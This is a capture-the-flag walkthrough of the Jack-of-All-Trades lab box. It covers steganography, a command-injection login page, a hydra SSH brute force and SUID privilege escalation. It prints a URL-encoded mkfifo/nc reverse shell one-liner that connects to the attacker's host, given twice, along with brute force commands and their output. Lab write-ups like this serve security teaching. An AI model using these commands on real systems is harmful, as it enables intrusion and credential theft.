
Jack-of-All-Trades


Last updated 2 years ago

Boot-to-root originally designed for Securi-Tay 2020

1. Reconnaissance

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -Pn -sC -sV 10.10.34.25
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 20:45 IST
Nmap scan report for 10.10.34.25
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.28 seconds
  • Ports 22 and 80 are open, but the services are swapped: Apache httpd 2.4.10 answers on 22 and OpenSSH 6.7p1 on 80. Every later step has to use the non-default port (browse to port 22, point ssh and hydra at port 80)

2. Enumeration

  • Browsing to the web server on port 22 (http://10.10.34.25:22/), we see a blog. Firefox refuses connections to port 22 by default; add 22 to network.security.ports.banned.override in about:config, or fetch the page with curl instead

  • Inspecting the page source, we find a base64-encoded string and a mention of the directory /recovery.php in the HTML comments

  • Decoding the base64 string, we find a mention of a certain Johny Graves and his encoding systems, as well as a password: u?WtKSraq

echo "UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==" | base64 -d
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq
  • Going over to /recovery.php, find a login portal

  • Viewing its source, we find another encoded string in the comments

  • It is not base64, so it is probably the "encoding system" of Johny Graves mentioned in the first comment

  • Googling Johny Graves turns up a MySpace page where a post describes his favourite crypto method: ROT13, then hex, then base32. Decoding therefore runs in reverse: base32 first, then hex, then ROT13 (CyberChef can chain the three operations)

  • The decoded comment reads: Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
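The base32, then hex, then ROT13 decode chain described above, written out in Python so it can be scripted rather than pasted into CyberChef. This is an added example and is not part of the original writeup; the sample message is the decoded hint quoted above, re-encoded here because the actual comment string from /recovery.php is not reproduced on this page. The encoding direction (ROT13, then hex, then base32) is the inverse of the decode order the writeup gives, and the function and regex names are mine.

```python
import base64
import binascii
import codecs
import re

# Constructed sample: the decoded hint quoted above, re-encoded with the same chain.
SAMPLE_PLAINTEXT = (
    "Remember that the credentials to the recovery login are hidden on the homepage! "
    "I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S"
)

BASE32_RE = re.compile(r"^[A-Z2-7]+=*$")          # RFC 4648 base32 alphabet plus padding
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")      # even-length hex string


def encode_chain(plaintext: str) -> str:
    """Johny Graves's encoding order: ROT13, then hex, then base32."""
    rot = codecs.encode(plaintext, "rot_13")       # ROT13 is str -> str in Python 3
    hexed = rot.encode("ascii").hex()               # e.g. 'Uv' -> '5576'
    return base64.b32encode(hexed.encode("ascii")).decode("ascii")


def decode_chain(blob: str) -> str:
    """Reverse the chain: base32 -> hex -> ROT13.

    Each stage is validated before it runs and a ValueError names the failing
    stage, so a wrong guess about the encoding order is reported instead of
    producing silent garbage.
    """
    blob = blob.strip().upper()
    if not BASE32_RE.match(blob):
        raise ValueError("stage 1: input is not in the base32 alphabet")
    try:
        hex_text = base64.b32decode(blob).decode("ascii")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"stage 1: base32 decode failed: {exc}") from exc
    if not HEX_RE.match(hex_text):
        raise ValueError("stage 2: base32 payload is not a hex string")
    try:
        rot_text = bytes.fromhex(hex_text).decode("ascii")
    except UnicodeDecodeError as exc:
        raise ValueError(f"stage 2: hex payload is not ASCII text: {exc}") from exc
    return codecs.decode(rot_text, "rot_13")


def is_chain(blob: str) -> bool:
    """True if the blob decodes cleanly through all three stages."""
    try:
        decode_chain(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    encoded = encode_chain(SAMPLE_PLAINTEXT)
    print("encoded:", encoded)
    print("decoded:", decode_chain(encoded))
```

Feeding the comment string from /recovery.php to decode_chain reproduces the hint above; feeding it something base64-encoded instead fails at stage 1 with a clear message, which is the quick way to tell the two comments apart.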

  • Following the link takes us to the Wikipedia page for Stegosauria; the name hints at steganography, and there is a stegosaurus image on the blog homepage

  • Downloading that image and running steghide's extract mode on it with the passphrase u?WtKSraq found earlier yields a file creds.txt

  • Viewing the file, we see that this is the wrong image

cat creds.txt 
Hehe. Gotcha!

You're on the right path, but wrong image!
  • jackinthebox.jpg does not give any results either

  • header.jpg, however, extracts a file cms.creds containing a username and password

cat cms.creds 
Here you go Jack. Good thing you thought ahead!

Username: jackinthebox
Password: TplFxiSHjY

jackinthebox : TplFxiSHjY

  • These credentials log us in to /recovery.php

  • The logged-in page runs whatever is supplied in the cmd query parameter, so appending ?cmd=<command> to its URL gives command execution as the web server user. To turn that into a shell, start a listener with nc -lvnp 4242 and send the mkfifo/nc reverse shell one-liner from PayloadsAllTheThings, URL-encoded so that the spaces, semicolons, pipes, ampersand and slashes survive the query string: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.11.66.165%204242%20%3E%2Ftmp%2Ff

3. Gaining Access

  • Catching the reverse shell on the listener and stabilising it: spawn a pty with python on the target, then background it with ^Z and run stty raw -echo; fg on the local machine

nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.34.25] 33549
/bin/sh: 0: can't access tty; job control turned off

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@jack-of-all-trades:/var/www/html/nnxhweOV$ ^Z
[1]  + 3578 suspended  nc -lvnp 4242

stty raw -echo; fg
[1]  + 3578 continued  nc -lvnp 4242

www-data@jack-of-all-trades:/var/www/html/nnxhweOV$ 
  • In /home we find a file jacks_password_list, a likely wordlist for brute forcing jack's password. Save it on the attacking machine as pass.txt

3.1 Hydra

  • We can use hydra to brute force jack's SSH password with that list; SSH is listening on port 80 here, hence ssh://10.10.34.25:80. Hydra warns that many SSH servers cap the number of parallel sessions, so rerun with -t 4 if attempts start failing

hydra -l jack -P pass.txt ssh://10.10.34.25:80
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-16 21:19:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.34.25:80/
[80][ssh] host: 10.10.34.25   login: jack   password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
  • We got the credentials:

    jack : ITMJpGGIqg1jn?>@

3.2 SSH

  • SSHing as jack, we find an image user.jpg

ssh jack@10.10.34.25 -p 80
The authenticity of host '[10.10.34.25]:80 ([10.10.34.25]:80)' can't be established.
ECDSA key fingerprint is SHA256:wABOsY4G6TIcuJ2bmAIpsoBGVR06p/QGP2J7tfiSy2s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.34.25]:80' (ECDSA) to the list of known hosts.
jack@10.10.34.25's password: 
jack@jack-of-all-trades:~$ ls
user.jpg
  • Viewing the image gives us the user flag

3.3 SUID

  • Finding files with the SUID bit set, i.e. binaries that run with their owner's privileges, to escalate

jack@jack-of-all-trades:~$ find / -perm -u=s -type f -ls 2>/dev/null
135127  456 -rwsr-xr-x   1 root     root       464904 Mar 22  2015 /usr/lib/openssh/ssh-keysign
134730  288 -rwsr-xr--   1 root     messagebus   294512 Feb  9  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135137   12 -rwsr-xr-x   1 root     root        10248 Apr 15  2015 /usr/lib/pt_chown
132828   44 -rwsr-xr-x   1 root     root        44464 Nov 20  2014 /usr/bin/chsh
132795   56 -rwsr-sr-x   1 daemon   daemon      55424 Sep 30  2014 /usr/bin/at
132826   56 -rwsr-xr-x   1 root     root        53616 Nov 20  2014 /usr/bin/chfn
133088   40 -rwsr-xr-x   1 root     root        39912 Nov 20  2014 /usr/bin/newgrp
133270   28 -rwsr-x---   1 root     dev         27536 Feb 25  2015 /usr/bin/strings
133273  148 -rwsr-xr-x   1 root     root       149568 Mar 12  2015 /usr/bin/sudo
133111   56 -rwsr-xr-x   1 root     root        54192 Nov 20  2014 /usr/bin/passwd
132940   76 -rwsr-xr-x   1 root     root        75376 Nov 20  2014 /usr/bin/gpasswd
133161   88 -rwsr-sr-x   1 root     mail        89248 Feb 11  2015 /usr/bin/procmail
138022 3052 -rwsr-xr-x   1 root     root      3124160 Feb 17  2015 /usr/sbin/exim4
    85   40 -rwsr-xr-x   1 root     root        40000 Mar 29  2015 /bin/mount
   131   28 -rwsr-xr-x   1 root     root        27416 Mar 29  2015 /bin/umount
   114   40 -rwsr-xr-x   1 root     root        40168 Nov 20  2014 /bin/su
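A small Python helper, added here and not part of the original writeup, that parses the find -ls listing above and answers the question the next bullet relies on: which SUID-root binaries can a given user actually execute? It goes slightly beyond the single case in the text by applying the POSIX owner/group/other rule to every entry and by listing the binaries whose world-execute bit is cleared, which only matter if id shows you in their group. The input is the listing exactly as printed above; the user and group names passed in are assumptions, since the writeup does not show jack's id output.

```python
from typing import Dict, List, Set

# The `find / -perm -u=s -type f -ls` output shown above, used as sample input.
FIND_LS = """\
135127  456 -rwsr-xr-x   1 root     root       464904 Mar 22  2015 /usr/lib/openssh/ssh-keysign
134730  288 -rwsr-xr--   1 root     messagebus   294512 Feb  9  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135137   12 -rwsr-xr-x   1 root     root        10248 Apr 15  2015 /usr/lib/pt_chown
132828   44 -rwsr-xr-x   1 root     root        44464 Nov 20  2014 /usr/bin/chsh
132795   56 -rwsr-sr-x   1 daemon   daemon      55424 Sep 30  2014 /usr/bin/at
132826   56 -rwsr-xr-x   1 root     root        53616 Nov 20  2014 /usr/bin/chfn
133088   40 -rwsr-xr-x   1 root     root        39912 Nov 20  2014 /usr/bin/newgrp
133270   28 -rwsr-x---   1 root     dev         27536 Feb 25  2015 /usr/bin/strings
133273  148 -rwsr-xr-x   1 root     root       149568 Mar 12  2015 /usr/bin/sudo
133111   56 -rwsr-xr-x   1 root     root        54192 Nov 20  2014 /usr/bin/passwd
132940   76 -rwsr-xr-x   1 root     root        75376 Nov 20  2014 /usr/bin/gpasswd
133161   88 -rwsr-sr-x   1 root     mail        89248 Feb 11  2015 /usr/bin/procmail
138022 3052 -rwsr-xr-x   1 root     root      3124160 Feb 17  2015 /usr/sbin/exim4
    85   40 -rwsr-xr-x   1 root     root        40000 Mar 29  2015 /bin/mount
   131   28 -rwsr-xr-x   1 root     root        27416 Mar 29  2015 /bin/umount
   114   40 -rwsr-xr-x   1 root     root        40168 Nov 20  2014 /bin/su
"""


def parse_find_ls(text: str) -> List[Dict[str, str]]:
    """Parse `find -ls` lines: inode blocks mode links owner group size month day year path."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 10)
        if len(parts) != 11 or len(parts[2]) != 10:
            continue  # blank line or something that is not a -ls record
        entries.append({"mode": parts[2], "owner": parts[4], "group": parts[5], "path": parts[10]})
    return entries


def is_setuid(entry: Dict[str, str]) -> bool:
    """'s' = setuid + owner exec, 'S' = setuid without owner exec."""
    return entry["mode"][3] in "sS"


def can_execute(entry: Dict[str, str], user: str, groups: Set[str]) -> bool:
    """POSIX rule: owner bits if you own the file, else group bits if you are in
    the group, else the other bits. Only one class applies, never a union."""
    mode = entry["mode"]
    if user == entry["owner"]:
        return mode[3] in "xs"
    if entry["group"] in groups:
        return mode[6] in "xs"
    return mode[9] in "xt"


def runnable_suid_root(entries: List[Dict[str, str]], user: str, groups: Set[str]) -> List[str]:
    """SUID binaries owned by root that this user can actually launch."""
    return sorted(e["path"] for e in entries
                  if is_setuid(e) and e["owner"] == "root" and can_execute(e, user, groups))


def group_gated(entries: List[Dict[str, str]]) -> Dict[str, str]:
    """SUID-root binaries with no world-execute bit, mapped to the group that unlocks them."""
    return {e["path"]: e["group"] for e in entries
            if is_setuid(e) and e["owner"] == "root" and e["mode"][9] == "-"}


ENTRIES = parse_find_ls(FIND_LS)

if __name__ == "__main__":
    # Assumed memberships: the writeup does not print `id` for jack.
    print("as jack (groups: jack)     :", runnable_suid_root(ENTRIES, "jack", {"jack"}))
    print("as jack (groups: jack, dev):", runnable_suid_root(ENTRIES, "jack", {"jack", "dev"}))
    print("group-gated SUID-root      :", group_gated(ENTRIES))
```

The interesting output is the difference between the two runs: /usr/bin/strings only appears when dev is in the group set, which is exactly the check to make on the target before assuming a -rwsr-x--- binary is usable.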
  • /usr/bin/strings is SUID root with mode -rwsr-x--- root:dev, so only root and members of group dev can execute it; since jack can, strings runs as root and can read files we otherwise could not, such as /root/root.txt. By default strings only prints runs of four or more printable characters, so pass -n 1 if a short line seems to be missing

strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: securi-tay2020_{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}

References

  • CyberChef, used to chain the From Base32, From Hex and ROT13 operations that decode the comment in /recovery.php (the encoding order was ROT13, then hex, then base32, so decoding reverses it)
  • PayloadsAllTheThings, source of the mkfifo/nc reverse shell one-liner sent through the cmd parameter, URL-encoded as rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.11.66.165%204242%20%3E%2Ftmp%2Ff